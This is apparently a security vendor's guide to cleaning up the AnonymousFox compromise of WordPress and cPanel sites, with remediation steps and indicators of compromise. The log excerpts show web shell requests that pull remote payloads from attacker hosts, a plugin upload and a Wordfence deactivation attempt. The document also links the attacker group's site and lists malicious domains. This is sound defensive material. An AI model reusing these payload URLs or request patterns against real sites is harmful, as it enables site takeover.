How To Clean AnonymousFox Hack & Prevent From Happening Again

The AnonymousFox hack will exploit outdated WordPress sites, later infecting core files, web files, and databases. The attacker will gain full cPanel access, so the process of reverting it is laborious.
I will describe how AnonymousFox develops, some key indicators, and the main steps in fighting it.

How this attack develops:
1. Using malicious scripts injected via WordPress, the following files are modified:
/home/user/.cpanel/contactinfo and /home/user/.contactemail
2. cPanel password is changed, using a newly created email [email protected]
Alternatively, secondary email accounts are created like [email protected]
3. WordPress users with administrator privileges are created.
Examples: “guest”, “AnonymousFox_” usernames.
4. Malicious WordPress plugins are added, which are used to manage files
Example: “/wp-content/plugins/llmrhps/data.php”

Need help? Let us clean your site.

How to address the AnonymousFox hack?

Step 1
Ask your web hosting support for a backup.
  • Perform a backup that will include the database, emails, and web files.
  • Download a backup copy on your local computer, to secure the latest working site version.
  • If the backup step is taking longer than few hours, move to Step 2.
Step 2
Disable all your sites
  • Disable all active sites. All the public files should be moved to a private folder.
  • If your tech knowledge is limited, ask your web host to temporarily suspend your cPanel.
  • Check for newly created subdomains.
Step 2.1
Review server settings.
If you have WHM access, review the suggestions from cPanel Security Advisor. Make sure each cPanel is properly isolated, to prevent cross-site contamination.

Step 3
Restore cPanel access.
  • Go to cPanel > Contact Information and change primary and secondary email.
  • Remove all FTP accounts under FTP Accounts.
  • Remove all suspicious email accounts under Email Accounts.
  • Review the Cronjobs.
  • If malicious files are automatically created, after deleting the Cron jobs, review PHP processes.
Step 4
Perform a thorough malware cleanup.

Notes:

cPanelLauren – “The anonymousfox vulnerability, caused by running vulnerable scripts on a cPanel account does not allow for root access.
Allowing vulnerable content on the server which in turn allows a way for an attacker to obtain access to the cPanel password reset does not constitute a bug.
What ultimately should be done here is remove the vulnerable content.”

Anonymous Fox has an official website, where members describe the current tools used for the attacks.
https://anonymousfox.co/

Need help? Try our Free security analysis.

Part 1: https://www.youtube.com/watch?v=IWsi1BGKqXA
Part 2: https://www.youtube.com/watch?v=5wcNvqhj7_E
Part 3: https://www.youtube.com/watch?v=ZvJp86xpcFU

Malicious URLs:
seo2.gloryday[.]work
hello.ok2345678[.]xyz/wp-class.txt
golang666[.]xyz/css.index
http://anonymousfox.io/v4/v4.txt
https://t.me/Anonymous_Fox/9
Domains: anonymousfox[.]is (158.69.55.40), anonymousfox[.]mx (176.123.0.55)

Malicious requests:
162.158.93.172 – – [02/Apr/2021:07:01:10 +1100] “POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1” 200
162.158.118.213 – – [02/Apr/2021:01:16:58 +1100] “GET /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1” 200 3703 “-” “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0”
[06/Mar/2021:06:16:50 +1100] “GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all&paged=1&s&_wpnonce=ffdf55bc02 HTTP/1.1” 403 1167 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[06/Mar/2021:06:16:58 +1100] “POST /wp-admin/update.php?action=upload-plugin HTTP/1.1” 200
[06/Mar/2021:06:17:05 +1100] “GET /wp-content/plugins/llmrhps/data.php HTTP/1.1” 200
[06/Mar/2021:23:27:12 +1100] “GET /wp-content/plugins/llmrhps/data.php HTTP/2” 200
[06/Mar/2021:23:27:15 +1100] “GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1” 200 100 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[06/Mar/2021:23:27:18 +1100] “POST /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1” 200 157 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[29/Mar/2021:02:26:41 +1100] “GET /wp-content/plugins/erwvxqtoto/wso.php HTTP/1.1” 200 3570 “https://example.com/wp-content/plugins/erwvxqtoto/up.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36”

167.99.49.25 – – [08/Dec/2021:19:57:48 +0100] “POST /wp-content/xydbtmlykd.php?php=anonymousfox.is/[email protected]/p2.txt HTTP/1.1” 200
167.99.49.25 – – [08/Dec/2021:19:57:34 +0100] “POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1” 200